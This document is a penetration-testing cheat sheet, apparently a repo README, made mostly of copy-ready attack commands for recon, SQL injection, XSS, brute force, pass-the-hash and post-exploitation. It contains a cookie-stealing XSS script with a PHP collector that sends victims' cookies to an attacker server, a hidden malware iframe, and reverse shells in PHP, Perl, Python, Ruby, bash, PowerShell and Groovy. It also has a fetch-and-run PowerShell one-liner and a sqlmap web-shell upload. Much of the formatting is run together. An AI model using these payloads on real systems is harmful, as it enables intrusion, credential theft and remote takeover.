HackTricks - the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.
This repo has a collection of snippets of codes and commands to help our lives!
The main purpose is not be a crutch, this is a way to do not waste our precious time!
- Fox Cheat Sheets
- Recon
- Exploitation
- Post Exploitation
- Resources
Resolve a given hostname to the corresponding IP.
nslookup targetorganization.comnslookup -type=PTR IP_addressnslookup -type=MX domainnslookup
server domain.com
ls -d domain.comhost -t ns(Name Server) < domain >
host -t ns domain.comafter that test nameservers
host -l < domain > < nameserver >
host -l domain.com ns2.domain.comnmap -F --dns-server <dns server ip> <target ip range>dnsenum targetdomain.comdnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.comtargetdomain.comdnsmap targetdomain.com -w <Wordlst file.txt>Brute Force, the file is saved in /tmp:
dnsmap targetdomain.com -rdnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xmlfierce -dns targetdomain.comhostmap.rb -only-passive -t <IP>We can use -with-zonetransfer or -bruteforce-level.
dig txt target.comdig TXT _dmarc.example.org- https://dnsdumpster.com/
- https://network-tools.com/nslook/
- https://www.dnsqueries.com/en/
- https://mxtoolbox.com/
Set the ip address as a variable:
export ip=192.168.1.100
export netw=192.168.1.0/24
Only IP's
nmap -sn -n $netw | grep for | cut -d" " -f5nmap -sS $ipOnly Open Ports and Banner Grab:
nmap -n -Pn -sS $ip --open -sVStealth scan using FIN Scan:
nmap -sF $ipWithout Ping scan, no dns resolution, show only open ports all and test All TCP Ports:
nmap -n -Pn -sS -A $ip --open -p-Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services:
nmap –v –sS –A –T4 $ipnmap -O $ipnmap -T4 -F $netwnmap -sV -T4 -O -F --version-light $netwnmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ipnmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netwls /usr/share/nmap/scripts/ | grep ftpOne port:
nc -nvz 192.168.1.23 80Port Range:
nc -vnz 192.168.1.23 0-1000- Server
nc -lvp 1234 > file_name_to_save- Client
nc -vn 192.168.1.33 1234 < file_to_send- Server
nc -lvp 1234 -e ping.sh <IP>- Client
nc -vn 192.168.1.33 1234- Server
ncat -nlvp 8000 --ssl- Client
ncat -nv 192.168.1.33 8000- Request
nc target port
HTTP_Verb path http/version
Host: url- Response
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.bropenssl s_client -quiet www.bla.com.br:443apt-get install snmp-mibs-downloader download-mibsecho "" > /etc/snmp/snmp.confonesixtyone -c COMMUNITY_FILE -i Target_ip
onesixtyone -c community.txt -i Found_ips.txtWalking MIB's:
snmpwalk -c COMMUNITY -v VERSION target_ip
snmpwalk -c public -v1 192.168.25.77Specific MIB node:
snmpwalk -c community -v version Target IP MIB Node
Example: USER ACCOUNTS = 1.3.6.1.4.1.77.1.2.25
snmpwalk -c public -v1 192.168.25.77 1.3.6.1.4.1.77.1.2.25snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY
snmp-check -t 172.20.10.5snmp-check -t 172.20.10.5 -c publicapt-get install snmp snmp-mibs-downloaderwget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rbnmap -sV -p 161 --script=snmp-info 172.20.10.0/24/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txtMySQL Open to wild:
mysql -h Target_ip -u root -pnmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ipdirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,olddirsearch -u target.com -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlistdirsearch -u https://target.com -e .dirb http://target.com /path/to/wordlistdirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.oldgobuster -u https://target.com -w /usr/share/wordlists/dirb/big.txtxfreerdp /v:<target_ip> -sec-nla /u:""
xfreerdp /v:192.168.0.32 -sec-nla /u:""xfreerdp /u:<user> /g:<domain> /p:<pass> /v:<target_ip>
xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> <target_ip>:3389
ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s <target_ip>/32 -v
crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/32 -vsudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 -L <target_ip> \\\\<target_ip>\\ <hash>
sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L 192.168.0.24 \\\\192.168.0.24\\ ljahdçjkhadkahdkjahsdlkjahsdlkhadkladsudo pth-smbclient --user=<user> --pw-nt-hash -m smb3 \\\\<target_ip>\\shared_folder <hash>
sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\192.168.0.24\\folder ljahdçjkhadkahdkjahsdlkjahsdlkhadkladSituation
http://<target>/index.php?parameter=valuehttp://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=indexhttp://<target>/script.php?page=../../../../../../../../etc/passwd
http://<target>/script.php?page=../../../../../../../../boot.iniThis is a simple test to see what happens, this is not a prove that the field is vuln to XSS:
<plaintext><script>alert('Found')</script>"><script>alert(Found)</script>"><script>alert(String.fromCharCode(88,83,83))</script>" onload="alert(String.fromCharCode(88,83,83))
" onload="alert('XSS')bla is not a valid image, so this cause an error:
<img src='bla' onerror=alert("XSS")>>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>";> cookie.txt
chmod 777 cookie.txt
Edit a php page like colector.php as follow:
<?php
$cookie=GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('cookie.txt', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>Script to put in page:
<scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script><iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe><iframe
src="https://jcw87.github.io/c2-smb1/"
width="100%"
height="600"
></iframe><input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus>SQL Injection
Adding a simpe quote '
Example:
http://192.168.1.104/Less-1/?id=5'./sqlmap.py -u http://localhost/Less-1/?id=1 --dbs./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name --tables./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --columns./sqlmap.py -u http://localhost/Less-1/?id=1 -D database_name -T table_name --dump-all./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs./sqlmap.py -u http://localhost/Less-1/?id=1 --privileges | grep FILE./sqlmap.py -u <URL> --file-read=<file to read>./sqlmap.py -u http://localhost/Less-1/?id=1 --file-read=/etc/passwd./sqlmap.py -u <url> --file-write=<file> --file-dest=<path>./sqlmap.py -u http://localhost/Less-1/?id=1 --file-write=shell.php --file-dest=/var/www/html/shell-php.php./sqlmap.py -u <POST-URL> --data="<POST-paramters> "./sqlmap.py -u http://localhost/Less-11/ --data "uname=teste&passwd=&submit=Submit" -p unameYou can also use a file like with the post request:
./sqlmap.py -r post-request.txt -p unameAdding a simpe quote '
Example:
http://192.168.1.104/Less-1/?id=5'Sorting columns to find maximum column:
http://192.168.1.104/Less-1/?id=-1 order by 1
http://192.168.1.104/Less-1/?id=-1 order by 2
http://192.168.1.104/Less-1/?id=-1 order by 3
Until it stop returning errors.
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3
Using the same amount of columns you got on the previous step.
postgresql
http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL
Using the same amount of columns you got on the previous step.
One of the columns will be printed with the respective number.
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()
postgres
http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()
postgres
http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, database()
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata
postgres
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database
mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"postgres
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"postgres
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"Example:
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;
In one query:
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users; mysql
http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users; postgres
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--
http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--
Remember to change dbname and tablename accordingly with the given situation.
After each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample.
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--
After each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample.
http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--
EXEC master..xp_cmdshell <command>
You need yo be 'sa' user.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'Tiny Reverse Shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1Create a simple powershell script called reverse.ps1:
function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetipDownload files with powershell:
powershell -c "Invoke-WebRequest -uri 'http://Your-IP:Your-Port/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-portpowershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"Creating a server with python3:
python -m http.serverCreating a server with python2:
python -m SimpleHTTPServer 80You need to create a FTP server:
- Server Linux Allow anonymous
python -m pyftpdlib -p 21 -u anonymous -P anonymous- Windows Client
ftp
open target_ip port
open 192.168.1.22 21We can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction.
Like this:
C:\Users\kitsunesec\Desktop>echo open 10.9.122.8>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt- server: put your files into
/var/www/html:
cp nc.exe /var/www/html
systemctl start apache2- client: get via web browser, wget or powershell...
Once you got SYSTEM on the target machine. download: openssh_for_windows:
powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\openssh.zip' c:\<path-to-where-you-whereever-you-want\"Then install it:
powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\install-sshd.ps1Now if you need, just adjust the firewall rules to your needs:
powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"Start the sshd service:
net start sshdAfter these steps a regular ssh tunnel would sufice:
From your linux machine:
$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>Done you have now a socks to tunnel through!
Create the Certificate:
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodesimport BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()- Wordlists
- Default Password
- Leak
- Tables